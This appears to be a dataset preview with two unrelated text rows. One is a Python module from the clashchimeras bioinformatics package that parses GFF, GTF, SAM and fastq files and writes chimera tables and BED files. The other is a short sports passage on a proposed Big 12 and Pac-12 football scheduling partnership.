text
stringlengths 29
850k
|
|---|
import csv
import gzip
import logging
import mmap
import os
import sys
import textwrap
from collections import Counter, defaultdict
from itertools import groupby
from operator import itemgetter
import pandas as pd
import pyfaidx
from Bio import SeqIO
from Bio.SeqRecord import SeqRecord
from Bio.Seq import Seq
import clashchimeras
logger = logging.getLogger('root')
class GFF:
    """GFF file parser for miRBase gff3 files.

    Uses a memory-mapped file object for random access: read() indexes the
    byte offset of every feature line, and process()/coordinates() then seek
    straight to a feature by name.

    Attributes:
        fileName: path of a miRBase gff3 file
        features: dict mapping a feature's Name attribute -> byte offset of
            its line in the file (filled by read())
    """

    def __init__(self, fileName=None):
        self.features = {}
        self.fileName = fileName

    def read(self, featureType='miRNA_primary_transcript'):
        """Index the gff3 file provided during class initialization.

        Stores the byte position of every record of the requested type in
        self.features, keyed by the record's Name attribute.

        Keyword Args:
            featureType: feature type of a gff3 record, the third column of
                every record. Change this (e.g. to 'miRNA') to index the
                mature form of microRNA instead of the primary transcript
                (default 'miRNA_primary_transcript')
        """
        logger.info('Reading %s' % self.fileName)
        # Read-only access is sufficient; 'r+b' would demand write
        # permission on the annotation file for no reason.
        self.fileHandle = open(self.fileName, 'rb')
        bytePosition = self.fileHandle.tell()
        for line in self.fileHandle:
            row = line.decode('utf-8').rstrip().split("\t")
            if not row[0].startswith("#") and row[2] == featureType:
                attributes = row[-1].split(";")
                for attribute in attributes:
                    if attribute.startswith('Name'):
                        mirbase_name = attribute.split("=")[-1]
                        self.features[mirbase_name] = bytePosition
            # tell() now points at the start of the next line.
            bytePosition = self.fileHandle.tell()
        self.fileHandle.close()
        logger.debug('Reading %s finished' % self.fileName)

    def process(self, name):
        """Return a Record with the genomic information for one feature.

        Args:
            name: a valid miRNA_primary_transcript name indexed by read()

        Returns:
            A Record with scaffold, start, end, strand, mirbase_id and
            mirbase_name attributes.
        """
        self.fileHandle = open(self.fileName, 'rb')
        # Explicit read-only mapping matches the read-only file handle.
        self.mm = mmap.mmap(self.fileHandle.fileno(), 0,
                            access=mmap.ACCESS_READ)
        self.mm.seek(self.features[name])
        row = self.mm.readline().decode('utf-8').rstrip().split("\t")
        attributes = row[-1].split(";")
        for attribute in attributes:
            if attribute.startswith("ID"):
                _id = attribute.split("=")[-1]
            elif attribute.startswith("Name"):
                _name = attribute.split("=")[-1]
        record = Record(scaffold=row[0], start=int(row[3]), end=int(row[4]),
                        strand=row[6], mirbase_id=_id, mirbase_name=_name)
        self.fileHandle.close()
        return record

    def coordinates(self, name, start=None, end=None):
        """Return bed record(s) with genomic coordinates for a segment.

        Keyword Args:
            start: 1-based alignment start within the cDNA; when both start
                and end are omitted the whole feature is used
            end: 1-based alignment end within the cDNA

        Args:
            name: a valid miRNA_primary_transcript name

        Returns:
            A list with one tuple of bed-record fields
            (scaffold, start, end, name, score, strand).
        """
        record = self.process(name)
        # Explicit None checks: 0 must not be mistaken for "not given".
        if start is None and end is None:
            start = 1
            end = record.end - record.start + 1
        positions = {}
        match_positions = []
        # Map 1-based relative (cDNA) positions onto 0-based genomic
        # positions, walking backwards for the minus strand.
        if record.strand == '+':
            _start = 1
            for relative, actual in enumerate(range(record.start - 1,
                                                    record.end),
                                              start=_start):
                positions[relative] = actual
            for pos in range(start, end + 1):
                match_positions.append(positions[pos])
            return [(record.scaffold, min(match_positions),
                     max(match_positions) + 1,
                     record.mirbase_name, 0, record.strand)]
        elif record.strand == '-':
            _start = 1
            for relative, actual in enumerate(reversed(range(record.start - 1,
                                                             record.end)),
                                              start=_start):
                positions[relative] = actual
            for pos in range(start, end + 1):
                match_positions.append(positions[pos])
            return [(record.scaffold, min(match_positions),
                     max(match_positions) + 1,
                     record.mirbase_name, 0, record.strand)]
class GTF:
    """GTF file parser for gencode gtf file

    This class uses memory-mapped file object to read a gencode gtf file. It
    contains methods to read, process a gtf file and return genomic coordinates

    Attributes:
        fileName: A gencode gtf file path
    """

    def __init__(self, fileName=None):
        # transcript_id -> byte offsets of its exon records (filled by read())
        self.features = defaultdict(list)
        # transcript_id -> parsed exon tuples (filled by readBiotype())
        self.biotypeFeatures = defaultdict(list)
        # gene_id -> byte offsets of its exon records (filled by read())
        self.geneFeatures = defaultdict(list)
        self.fileName = fileName
        # transcript_id -> gene_id mapping (filled by read())
        self.geneIds = {}

    def readBiotype(self, featureType='exon', biotype=None):
        """Parse exon records of one transcript biotype into memory.

        Fills self.biotypeFeatures with, per transcript_id, tuples of
        (exon_number, scaffold, start, end, strand, gene_id, havana_gene,
        havana_transcript, transcript_name, gene_name).

        Keyword Args:
            featureType: third column of a gtf record to select (default 'exon')
            biotype: gencode transcript_type to keep; 'tRNA' is mapped to the
                special gencode value 'tRNAscan'
        """
        logger.info('Reading %s' % self.fileName)
        self.fileHandle = open(self.fileName, 'r+b')
        for line in self.fileHandle:
            row = line.decode('utf-8').rstrip().split("\t")
            if not row[0].startswith("#") and row[2] == featureType:
                # Gencode attributes look like: key "value"; key "value"; ...
                attributes = row[-1].split("; ")
                havana_transcript = '-'
                havana_gene = '-'
                exon_number = '0'
                for attribute in attributes:
                    if attribute.startswith("transcript_id"):
                        transcript_id = attribute.split(" ")[-1][1:-1]
                    elif attribute.startswith("transcript_type"):
                        transcript_type = attribute.split(" ")[-1][1:-1]
                    elif attribute.startswith("exon_number"):
                        exon_number = int(attribute.split(" ")[-1])
                    elif attribute.startswith("havana_gene"):
                        havana_gene = attribute.split(" ")[-1][1:-1]
                    elif attribute.startswith("havana_transcript"):
                        # NOTE(review): [1:-2] (not [1:-1]) — presumably strips
                        # a trailing ';' as well as the quote; confirm against
                        # the gtf attribute layout.
                        havana_transcript = attribute.split(" ")[-1][1:-2]
                    elif attribute.startswith("gene_id"):
                        gene_id = attribute.split(" ")[-1][1:-1]
                    elif attribute.startswith("gene_name"):
                        gene_name = attribute.split(" ")[-1][1:-1]
                    elif attribute.startswith("transcript_name"):
                        transcript_name = attribute.split(" ")[-1][1:-1]
                if biotype == 'tRNA':
                    # Gencode labels tRNA transcripts as 'tRNAscan'.
                    if transcript_type == "tRNAscan":
                        self.biotypeFeatures[transcript_id].append((exon_number, row[0],
                                                                    int(row[3]), int(row[4]),
                                                                    row[6], gene_id,
                                                                    havana_gene,
                                                                    havana_transcript,
                                                                    transcript_name,
                                                                    gene_name))
                else:
                    if transcript_type == biotype:
                        self.biotypeFeatures[transcript_id].append((exon_number, row[0],
                                                                    int(row[3]), int(row[4]),
                                                                    row[6], gene_id,
                                                                    havana_gene,
                                                                    havana_transcript,
                                                                    transcript_name,
                                                                    gene_name))
        self.fileHandle.close()

    def read(self, featureType='exon'):
        """Reads gtf file provided during class initialization

        Stores the byte positions of every feature in a defaultdict(list) object
        named self.features (keyed by transcript_id) and in self.geneFeatures
        (keyed by gene_id), and records the transcript_id -> gene_id mapping
        in self.geneIds.

        Keyword Args:
            featureType: Feature type of a gtf record, the third element of every
                record in the file. Please change this if you want to get specific
                records (e.g. 'UTR') (default 'exon')
        """
        logger.info('Reading %s' % self.fileName)
        # First pass: index byte offsets by transcript_id.
        self.fileHandle = open(self.fileName, 'r+b')
        bytePosition = self.fileHandle.tell()
        for line in self.fileHandle:
            row = line.decode('utf-8').rstrip().split("\t")
            if not row[0].startswith("#") and row[2] == featureType:
                attributes = row[-1].split("; ")
                for attribute in attributes:
                    if attribute.startswith("transcript_id"):
                        transcript_id = attribute.split(" ")[-1][1:-1]
                        self.features[transcript_id].append(bytePosition)
                        # NOTE(review): gene_id here is the value parsed on an
                        # earlier iteration — this relies on gene_id preceding
                        # transcript_id in gencode's attribute order; verify.
                        self.geneIds[transcript_id] = gene_id
                    if attribute.startswith("gene_id"):
                        gene_id = attribute.split(" ")[-1][1:-1]
            bytePosition = self.fileHandle.tell()
        self.fileHandle.close()
        # Second pass: index byte offsets by gene_id.
        self.fileHandle = open(self.fileName, 'r+b')
        bytePosition = self.fileHandle.tell()
        for line in self.fileHandle:
            row = line.decode('utf-8').rstrip().split("\t")
            if not row[0].startswith("#") and row[2] == featureType:
                attributes = row[-1].split("; ")
                for attribute in attributes:
                    if attribute.startswith("gene_id"):
                        gene_id = attribute.split(" ")[-1][1:-1]
                        self.geneFeatures[gene_id].append(bytePosition)
            bytePosition = self.fileHandle.tell()
        self.fileHandle.close()
        logger.debug('Reading %s finished' % self.fileName)

    def process(self, name):
        """A generator yielding one Record per exon of a transcript

        Args:
            name: A valid gencode transcript_id

        Yields:
            Record objects containing scaffold, start, end, strand,
            transcript_type, transcript_id, exon_id, exon_number and
            gene_name as attributes
        """
        self.fileHandle = open(self.fileName, 'r+b')
        self.mm = mmap.mmap(self.fileHandle.fileno(), 0)
        positions = self.features[name]
        for position in positions:
            # Seek straight to the indexed line for this exon.
            self.mm.seek(position)
            row = self.mm.readline().decode('utf-8').rstrip().split("\t")
            attributes = row[-1].split("; ")
            _eid = '-'
            _enb = '0'
            for attribute in attributes:
                if attribute.startswith("transcript_type"):
                    _tt = attribute.split(" ")[-1][1:-1]
                elif attribute.startswith("transcript_id"):
                    _tid = attribute.split(" ")[-1][1:-1]
                elif attribute.startswith("exon_id"):
                    _eid = attribute.split(" ")[-1][1:-1]
                elif attribute.startswith("exon_number"):
                    _enb = int(attribute.split(" ")[-1])
                elif attribute.startswith("gene_name"):
                    _gn = attribute.split(" ")[-1][1:-1]
            record = Record(scaffold=row[0], start=int(row[3]), end=int(row[4]),
                            strand=row[6], transcript_type=_tt, transcript_id=_tid, exon_id=_eid,
                            exon_number=_enb, gene_name=_gn)
            yield record
        self.fileHandle.close()

    def geneExonicRegions(self, df):
        """Given a DataFrame with the exon coordinates from Gencode for a single
        gene, return the total number of coding regions in that gene.
        """
        scaffold = df.iloc[0].scaffold
        strand = df.iloc[0].strand
        gene_type = df.iloc[0].gene_type
        gene_id = df.iloc[0].gene_id
        gene_name = df.iloc[0].gene_name
        start = df.start.min()
        end = df.end.max()
        # Boolean coverage mask over the gene's genomic span: True wherever
        # at least one exon covers the base.
        bp = [False] * (end - start + 1)
        for i in range(df.shape[0]):
            s = df.iloc[i]['start'] - start
            e = df.iloc[i]['end'] - start + 1
            bp[s:e] = [True] * (e - s)
        regions = list(range(start, end + 1))
        # Collapse the mask into runs of covered/uncovered bases; each True
        # run is one merged exonic region.
        groups = []
        for i, j in groupby(bp):
            groups.append((i, len(list(j))))
        e_start = 0
        for i in groups:
            e_end = e_start + i[1]
            if i[0]:
                record = Record(scaffold=scaffold, start=regions[e_start],
                                end=regions[e_end - 1], gene_type=gene_type, gene_id=gene_id,
                                gene_name=gene_name, strand=strand)
                yield record
            e_start += i[1]

    def geneProcess(self, name):
        """A generator yielding one Record per merged exonic region of a gene

        Args:
            name: A valid gencode gene_id

        Yields:
            Record objects containing scaffold, start, end, strand, gene_type,
            gene_id and gene_name as attributes
        """
        self.fileHandle = open(self.fileName, 'r+b')
        self.mm = mmap.mmap(self.fileHandle.fileno(), 0)
        positions = self.geneFeatures[name]
        exons = []
        for position in positions:
            self.mm.seek(position)
            row = self.mm.readline().decode('utf-8').rstrip().split("\t")
            attributes = row[-1].split("; ")
            for attribute in attributes:
                if attribute.startswith("gene_type"):
                    _gt = attribute.split(" ")[-1][1:-1]
                elif attribute.startswith("gene_id"):
                    _gid = attribute.split(" ")[-1][1:-1]
                elif attribute.startswith("gene_name"):
                    _gn = attribute.split(" ")[-1][1:-1]
            exons.append((row[0], int(row[3]), int(row[4]), row[6], _gt, _gid, _gn))
        self.fileHandle.close()
        # Merge overlapping exons across transcripts via the coverage mask.
        exons_df = pd.DataFrame(exons, columns=['scaffold', 'start', 'end',
                                                'strand', 'gene_type', 'gene_id', 'gene_name'])
        for record in self.geneExonicRegions(exons_df):
            yield record

    def coordinates(self, name, start=None, end=None):
        """Return bed records with genomic coordinates for an aligned segment

        Keyword Args:
            start: The alignment start position of the cDNA molecule or the relative
                start of the particular molecule
            end: The alignment end position in the cDNA molecule or the relative end
                of the particular molecule

        Args:
            name: A valid gencode transcript_id (optionally with '|'-joined
                annotation suffixes, which are stripped)

        Returns:
            A list of tuple(s) of strings containing elements for a bed record. There
            may be more than one because of alternate splicing.
        """
        if "|" in name:
            self.name = name.split("|")[0]
        else:
            self.name = name
        positions = {}
        match_positions = []
        records = []
        segments = []
        result_segments = []
        for record in self.process(self.name):
            records.append(record)
        # Exons must be walked in transcript order to build the cDNA map.
        records.sort(key=lambda x: int(x.exon_number))
        if records[0].strand == '+':
            _start = 1
            # Map 1-based cDNA positions onto genomic positions, exon by exon.
            for record in records:
                for relative, actual in enumerate(range(record.start, record.end + 1),
                                                  start=_start):
                    positions[relative] = actual
                _start = relative + 1
            # NOTE(review): range(start, end) excludes `end`, unlike GFF's
            # end-inclusive mapping — presumably a half-open convention here;
            # confirm against callers.
            for pos in range(start, end):
                match_positions.append(positions[pos])
            # groupby on (index - value) groups runs of consecutive genomic
            # positions, i.e. one segment per crossed exon.
            for key, group in groupby(enumerate(match_positions),
                                      lambda x: x[0] - x[-1]):
                segment = list(map(itemgetter(1), group))
                segments.append([segment[0], segment[-1]])
            for segment in segments:
                for record in records:
                    if segment[0] >= record.start and segment[1] <= record.end:
                        result_segments.append((record.scaffold, segment[0], segment[1],
                                                record.transcript_id + '|' + record.gene_name, 0, record.strand))
        elif records[0].strand == '-':
            _start = 1
            # Minus strand: walk each exon's genomic positions backwards.
            for record in records:
                for relative, actual in enumerate(reversed(range(record.start,
                                                                 record.end + 1)), start=_start):
                    positions[relative] = actual
                _start = relative + 1
            for pos in range(start, end):
                match_positions.append(positions[pos])
            for key, group in groupby(enumerate(reversed(match_positions)),
                                      lambda x: x[0] - x[-1]):
                segment = list(map(itemgetter(1), group))
                segments.append([segment[0], segment[-1]])
            for segment in segments:
                for record in records:
                    if segment[0] >= record.start and segment[1] <= record.end:
                        result_segments.append((record.scaffold, segment[0], segment[1],
                                                record.transcript_id + '|' + record.gene_name, 0, record.strand))
        if len(result_segments) == 0:
            # Nothing mapped — dump the inputs to help debugging.
            logger.debug('%s, %s, %s' % (name, start, end))
            logger.debug('%s' % str(segments))
            for r in records:
                logger.debug('%s %s %s %s' % (r.scaffold, r.strand,
                                              r.start, r.end))
        return result_segments
class SAM:
    """SAM file parser for parsing bowtie2 generated files.

    Uses a memory-mapped file object for random access to alignment records.

    Attributes:
        fileName: A sam file path
        records: dict mapping query name -> byte offset of its record line
    """

    def __init__(self, fileName=None):
        self.fileName = fileName
        self.records = {}

    def read(self, flag=0):
        """Index the sam file provided during class initialization.

        Stores the byte position of every record whose FLAG equals the given
        value in self.records, keyed by query name.

        Keyword Args:
            flag: The SAM alignment flag for a record. The default selects
                primary alignments and ignores secondary ones (default 0)
        """
        logger.info('Reading %s' % self.fileName)
        # Read-only access is sufficient for indexing.
        self.fileHandle = open(self.fileName, 'rb')
        bytePosition = self.fileHandle.tell()
        for line in self.fileHandle:
            read = line.decode('utf-8').split("\t")
            if not read[0].startswith("@") and read[1] == str(flag):
                self.records[read[0]] = bytePosition
            bytePosition = self.fileHandle.tell()
        self.fileHandle.close()
        logger.debug('Reading %s finished' % self.fileName)

    def access(self, queryName):
        """Random access of a record from the sam file.

        Args:
            queryName: The query name of the read from the sam file

        Returns:
            A Record (see pretty()) built from the alignment line
        """
        self.fileHandle = open(self.fileName, 'rb')
        # Explicit read-only mapping matches the read-only file handle.
        self.mm = mmap.mmap(self.fileHandle.fileno(), 0,
                            access=mmap.ACCESS_READ)
        self.mm.seek(self.records[queryName])
        row = self.mm.readline().decode('utf-8').rstrip().split("\t")
        self.fileHandle.close()
        return self.pretty(row)

    def filterPotentialChimeras(self, min_length=30, flag=0, target=None):
        """Generate a filtered fasta file of potential chimeras from a sam file.

        A read qualifies when its FLAG matches and its sequence is at least
        min_length long.

        Keyword Args:
            min_length: Minimum read length to be selected as a potential
                chimera (default 30)
            flag: The SAM alignment flag describing the type of alignment
                (default 0)
            target: The prefix for output file

        Returns:
            The path of the (possibly pre-existing) filtered fasta file
        """
        logger.debug('Filtering {} for potential chimeras'.format(target))
        target = '{}.filter.fasta'.format(target.rpartition(".")[0])
        if os.path.exists(target):
            logger.info('Skipping filtering for {}'.format(target))
        else:
            with open(target, 'w') as oH:
                with open(self.fileName) as iH:
                    for row in csv.reader(iH, delimiter="\t"):
                        if not row[0].startswith('@') and row[1] == str(flag):
                            # Fix: honour the min_length parameter instead of
                            # the hard-coded literal 30.
                            if len(row[9]) >= min_length:
                                print(textwrap.fill('>%s' % row[0], width=80), file=oH)
                                print(textwrap.fill('%s' % row[9], width=80), file=oH)
            logger.debug('Filtering finished')
        return target

    def pretty(self, row):
        """Build a Record from a split SAM line.

        Args:
            row: list of SAM fields for one alignment line

        Returns:
            A Record with refId, start, end, mismatchInfo, sequence, cigar,
            cigarString and matchLength attributes
        """
        refId = row[2]
        start = int(row[3])
        # Default to None so a record without an MD tag no longer raises
        # UnboundLocalError below.
        mismatchInfo = None
        for i in row[10:]:
            if i.startswith('MD'):
                mismatchInfo = i
        sequence = row[9]
        cigar = row[5]
        cigarString = clashchimeras.methods.convertCigar(row[5])
        # Reference span = matches + deletions (insertions consume no
        # reference bases).
        matchLength = cigarString.count("M") + cigarString.count("D")
        end = start + matchLength - 1
        record = Record(refId=refId, start=start, mismatchInfo=mismatchInfo,
                        sequence=sequence, cigarString=cigarString, matchLength=matchLength,
                        cigar=cigar, end=end)
        return record
class Output:
    """Contains methods for writing output files

    This class is used to generate every kind of output generated by this
    package which includes plain text, ansi colored text and bed file

    Attributes:
        target: A prefix for output file which will be automatically followed by
            extension (default 'wip')
        overlap: Minimum overlap to be set between two molecules when determining
            chimera (default 4)
        gap: Maximum gap (number of unknown nucleotides) to be allowed between
            two molecules within a chimera (default 9)
    """

    def __init__(self,
                 target=None,
                 smallRNABed=False,
                 targetRNABed=False,
                 overlap=4,
                 gap=9):
        self.target = target
        self.overlap = overlap
        self.gap = gap
        # Optionally open the smallRNA bed output and write its header rows.
        if smallRNABed:
            self.smallRNABedHandle = open('{}.smallRNA.bed'.format(self.target), 'w')
            print('# BED locations of smallRNA part of the identified chimera',
                  file=self.smallRNABedHandle)
            self.smallRNABedCSV = csv.writer(self.smallRNABedHandle, delimiter="\t")
            self.smallRNABedCSV.writerow(
                ['# The name field represents the following:'])
            self.smallRNABedCSV.writerow(
                ['# E.g. 201980-1-48|hsa-mir-100==PAPSS1'])
            self.smallRNABedCSV.writerow(
                ['# 201980-1-48 is the fasta identifier'])
            self.smallRNABedCSV.writerow(
                ["# 201980 is the unique identifier"])
            self.smallRNABedCSV.writerow(
                ["# 1 is the number of times that sequence was observed in raw "
                 "fastq "])
            self.smallRNABedCSV.writerow(
                ["# 48 is the length of the sequence"])
            self.smallRNABedCSV.writerow(
                ['# hsa-mir-100 represents the smallRNA transcript'])
            self.smallRNABedCSV.writerow(
                ['# PAPSS1 represents the gene symbol for targetRNA transcript '
                 'transcript '])
        # Optionally open the targetRNA bed output and write its header rows.
        if targetRNABed:
            self.targetRNABedHandle = open('{}.targetRNA.bed'.format(self.target),
                                           'w')
            self.targetRNABedCSV = csv.writer(self.targetRNABedHandle, delimiter="\t")
            self.targetRNABedCSV.writerow(
                ['# The name field represents the following:'])
            self.targetRNABedCSV.writerow(
                ['# E.g. 136019-1-48|ENST00000375759.6|SPEN==hsa-mir-103a-2'])
            self.targetRNABedCSV.writerow(
                ['# 136019-1-48 is the fasta identifier'])
            self.targetRNABedCSV.writerow(
                ["# 136019 is the unique identifier"])
            self.targetRNABedCSV.writerow(
                ["# 1 is the number of times that sequence was observed in raw "
                 "fastq "])
            self.targetRNABedCSV.writerow(
                ["# 48 is the length of the sequence"])
            self.targetRNABedCSV.writerow(
                ["# ENST00000375759.6 is the targetRNA transcript identifier"])
            self.targetRNABedCSV.writerow(
                ['# SPEN is the gene symbol for for targetRNA transcript '
                 'ENST00000375759.6'])
            self.targetRNABedCSV.writerow(
                ['# hsa-mir-103a-2 represents the smallRNA transcript '])
        # The main chimera table is always written.
        self.hybWriter = open('%s.chimeras.tsv' % self.target, 'w')
        self.hybComments()

    def hybComments(self):
        """Write the explanatory comment header of the chimeras tsv file."""
        print("# fasta Identifier: The identifier in <sample>.unique.fasta. ",
              "#\tE.g. 123456-3-68 ",
              "#\t123456 is the unique identifier",
              "#\t3 is the number of times that sequence was observed in raw "
              "fastq ",
              "#\t68 is the length of the sequence", sep="\n", file=self.hybWriter)
        print("# smallRNA: The cDNA ID of the type of RNA labelled as smallRNA in "
              "the analysis",
              "#\tE.g. hsa-let-7b (miRBase identifier)",
              "#\tE.g. ENST00000619178.1|SNORD3D| (Gencode snoRNA identifier)",
              sep="\n", file=self.hybWriter)
        print("# smallRNA_start: cDNA alignment start position of the smallRNA "
              "part of the chimera", file=self.hybWriter)
        print("# smallRNA_MDtag: Showing the MD tag from the smallRNA SAM "
              "alignment for the chimera",
              "#\tSAM file format specification",
              "#\thttp://samtools.github.io/hts-specs/SAMv1.pdf",
              "#\tMD Z String for mismatching positions.Regex:[0-9]+((["
              "A-Z]|\^[A-Z]+)[0-9]+)*9", sep="\n", file=self.hybWriter)
        print('# smallRNA_cigar: Cigar string from the smallRNA SAM alignment for '
              'the chimera',
              "#\tSAM file format specification",
              "#\thttp://samtools.github.io/hts-specs/SAMv1.pdf",
              '#\tSee CIGAR in the file', sep="\n", file=self.hybWriter)
        print('# arbitrary_chimera: The chimera representation indicating what '
              'part of the sequence represents smallRNA and targetRNA',
              '#\t{ is representing a match with smallRNA',
              '#\t} is representing a match with targetRNA',
              '#\t# is representing unaligned sequences (identified as --gap -ga)',
              '#\t- is representing a deletion (D in cigar string)',
              '#\t+ is representing a deletion (I in cigar string)',
              '#\tE.g {{{{{{{{-{{{{{{{{{{{{{##}}}}}}}}}}+}}}}}}}}}}}}}}}}}}}}}}'
              '#\tE.g The first 22 nucleotides are aligning to smallRNA cDNA',
              '#\tE.g The last 33 nucleotides are aligning to targetRNA cDNA',
              sep="\n", file=self.hybWriter)
        print('# read_sequence: The actual sequence that is appeared in raw '
              'reads', file=self.hybWriter)
        print("# targetRNA: The cDNA ID of the type of RNA labelled as targetRNA "
              "in "
              "the analysis",
              "#\tE.g. hsa-let-7b (miRBase identifier)",
              "#\tE.g. ENST00000619178.1|SNORD3D| (Gencode snoRNA identifier)",
              sep="\n", file=self.hybWriter)
        print("# targetRNA_start: cDNA alignment start position of the targetRNA "
              "part of the chimera", file=self.hybWriter)
        print("# targetRNA_MDtag: Showing the MD tag from the targetRNA SAM "
              "alignment for the chimera",
              "#\tSAM file format specification",
              "#\thttp://samtools.github.io/hts-specs/SAMv1.pdf",
              "#\tMD Z String for mismatching positions.Regex:[0-9]+((["
              "A-Z]|\^[A-Z]+)[0-9]+)*9", sep="\n", file=self.hybWriter)
        print('# targetRNA_cigar: Cigar string from the targetRNA SAM alignment '
              'for '
              'the chimera',
              "#\tSAM file format specification",
              "#\thttp://samtools.github.io/hts-specs/SAMv1.pdf",
              '#\tSee CIGAR in the file', sep="\n", file=self.hybWriter)
        # Column header row of the tsv.
        print("# fasta_Identifier", "smallRNA", "smallRNA_start", "smallRNA_MDtag",
              "smallRNA_cigar", "arbitrary_chimera", "read_sequence", "targetRNA",
              "targetRNA_start", "targetRNA_MDtag", "targetRNA_cigar", sep="\t",
              file=self.hybWriter)

    def writeTargetRNABed(self, query, targetRNASegments, smallRNA):
        """Write one bed row per targetRNA segment of a chimera.

        Args:
            query: fasta identifier of the read
            targetRNASegments: iterable of bed-field tuples for the targetRNA
            smallRNA: smallRNA identifier; for '|'-joined Gencode ids the
                gene-symbol field (index 5) is used
        """
        if "ENS" in smallRNA and "|" in smallRNA:
            _smallRNA = smallRNA.split("|")[5]
        else:
            _smallRNA = smallRNA
        for segment in targetRNASegments:
            _segment = list(segment)
            # name field: <query>|<segment name>==<smallRNA>
            _segment[3] = query + "|" + _segment[3] + "==" + _smallRNA
            self.targetRNABedCSV.writerow(_segment)

    def writeSmallRNABed(self, query, smallRNASegments, targetRNA):
        """Write one bed row per smallRNA segment of a chimera.

        Args:
            query: fasta identifier of the read
            smallRNASegments: iterable of bed-field tuples for the smallRNA
            targetRNA: targetRNA identifier; for '|'-joined Gencode ids the
                gene-symbol field (index 5) is used
        """
        if "ENS" in targetRNA and "|" in targetRNA:
            _targetRNA = targetRNA.split("|")[5]
        else:
            _targetRNA = targetRNA
        for segment in smallRNASegments:
            _segment = list(segment)
            _segment[3] = query + "|" + _segment[3] + "==" + _targetRNA
            self.smallRNABedCSV.writerow(_segment)

    def write(self, queryName, smallRNA, targetRNA):
        """Write one chimera row to the chimeras tsv.

        Args:
            queryName: fasta identifier of the read
            smallRNA: Record of the smallRNA alignment (see SAM.pretty)
            targetRNA: Record of the targetRNA alignment (see SAM.pretty)
        """
        chimeraString = clashchimeras.methods.chimeraOrNot(smallRNA.cigarString,
                                                           targetRNA.cigarString, overlap=self.overlap, gap=self.gap)
        smallRNARegion = clashchimeras.methods.findRegion(smallRNA)
        targetRNARegion = clashchimeras.methods.findRegion(targetRNA)
        print(queryName, smallRNARegion, smallRNA.start, smallRNA.mismatchInfo,
              smallRNA.cigar, chimeraString, smallRNA.sequence,
              targetRNARegion, targetRNA.start,
              targetRNA.mismatchInfo, targetRNA.cigar, sep="\t", file=self.hybWriter)

    def __del__(self):
        # Best-effort flush/close of the main output on garbage collection.
        self.hybWriter.close()
class Fasta:
    """Extracts transcript sequences of one biotype from an indexed genome.

    Attributes:
        genome: path of the genome fasta (indexed via pyfaidx)
        gtf: path of the matching gencode gtf annotation
    """

    def __init__(self, genome=None, gtf=None):
        self.genome = genome
        self.gtf = gtf
        self.faidx = pyfaidx.Fasta(self.genome)

    def getBiotype(self, output=None, biotype=None):
        """Assemble spliced cDNA sequences for every transcript of a biotype
        and write them to a fasta file.

        Keyword Args:
            output: path of the fasta file to write (required)
            biotype: gencode transcript_type to extract; 'tRNA' selects the
                special 'tRNAscan' feature type
        """
        self.sequences = []
        annotation = GTF(fileName=self.gtf)
        if biotype == 'tRNA':
            annotation.readBiotype(biotype=biotype, featureType='tRNAscan')
        else:
            annotation.readBiotype(biotype=biotype)
        for transcript_id, exons in annotation.biotypeFeatures.items():
            # Exons are stitched together in exon_number order; minus-strand
            # exons are reverse-complemented by pyfaidx's unary minus.
            exons.sort(key=itemgetter(0))
            pieces = []
            for exon in exons:
                if exon[4] == '-':
                    pieces.append((-self.faidx[exon[1]][exon[2] - 1:exon[3]]).seq)
                elif exon[4] == '+':
                    pieces.append(self.faidx[exon[1]][exon[2] - 1:exon[3]].seq)
            temp_seq = ''.join(pieces)
            # Identifier carries the annotation fields plus the cDNA length.
            _id = '{}|{}|{}|{}|{}|{}|{}'.format(transcript_id,
                                                exons[0][5],
                                                exons[0][6],
                                                exons[0][7],
                                                exons[0][8],
                                                exons[0][9],
                                                len(temp_seq))
            self.sequences.append(SeqRecord(seq=Seq(temp_seq), id=_id,
                                            description=''))
        if not output:
            logger.error('Please provide output file..')
            sys.exit()
        logger.info('Writing {}'.format(output))
        SeqIO.write(self.sequences, output, 'fasta')
class Fastq:
    """Reader that collapses a (optionally gzipped) fastq file into unique
    sequences.

    Attributes:
        fileName: path of the fastq file
        compressed: True when fileName is gzip-compressed
        n: number of lines per fastq record (always 4)
        sequences: Counter mapping read sequence -> observation count
        uniqueOutput: path of the generated <sample>.unique.fasta file
    """

    def __init__(self, fileName=None, compressed=False):
        self.fileName = fileName
        self.compressed = compressed
        self.n = 4
        self.sequences = Counter()
        self.uniqueOutput = fileName.rpartition(".")[0] + '.unique.fasta'

    def recordIterator(self):
        """Yield fastq records as lists of self.n decoded, stripped lines."""
        record = []
        record_length = 0
        for line in self.fileHandle:
            if record_length == self.n:
                yield record
                record_length = 0
                record = []
            record.append(line.decode().rstrip())
            record_length += 1
        # Fix: only yield the trailing record when it exists. Previously an
        # empty input file yielded an empty list, crashing createUnique()
        # on record[1].
        if record:
            yield record

    def createUnique(self):
        """Count identical read sequences and write a unique fasta.

        Output identifiers have the form index-count-length, sorted by
        descending observation count.
        """
        if self.compressed:
            self.fileHandle = gzip.open(self.fileName, 'rb')
        else:
            self.fileHandle = open(self.fileName, 'rb')
        logger.info('Reading {}'.format(self.fileName))
        for record in self.recordIterator():
            # record[1] is the sequence line of the fastq record.
            self.sequences[record[1]] += 1
        logger.info('Writing {}'.format(self.uniqueOutput))
        with open(self.uniqueOutput, 'w') as wH:
            for index, (sequence, counts) in enumerate(sorted(self.sequences.items(),
                                                              key=itemgetter(1), reverse=True), start=1):
                print('>{}-{}-{}'.format(index, counts, len(sequence)), file=wH)
                print(textwrap.fill(sequence, width=80), file=wH)
        logger.debug('Finished writing {}'.format(self.uniqueOutput))
        self.fileHandle.close()
class Record:
    """Lightweight attribute bag (preferred over a dict for dotted access).

    GFF, GTF and SAM build these from parsed annotation/alignment fields.
    """

    def __init__(self, **kwds):
        # Promote every keyword argument to an instance attribute.
        for attr, value in kwds.items():
            setattr(self, attr, value)
|
Wefald’s proposal calls for all 30 of the Big 12’s non-conference games and for 30 of the Pac-12’s 36 out-of-league games to be played against each other.
The matchups would be spread evenly across the season (10 per month) with the winners of each conference meeting at the end of the regular season for a championship game, which would rotate between the Rose Bowl and AT&T Stadium.
The 10 Big 12 teams and 12 Pac-12 teams would create, kind of, one big conference. It’s not exactly like the BIG SUPERCONFERENCE ideas that so often come up in realignment chatter, but this would be a close relationship between two leagues.
If you don’t think too hard about it, it’s easy to see the merit behind the Pac-12 and Big 12 creating a scheduling deal.
Getting Pac-12 teams to regularly play in Texas and Big 12 teams to regularly play in California would be great for everyone’s recruiting. It’s a lot easier for a program to sell tickets to games against schools most fans have actually heard of. A long-term agreement would potentially make the future TV rights for both conferences more attractive (especially because the Pac-12 would get more inventory outside of the Pacific time zone).
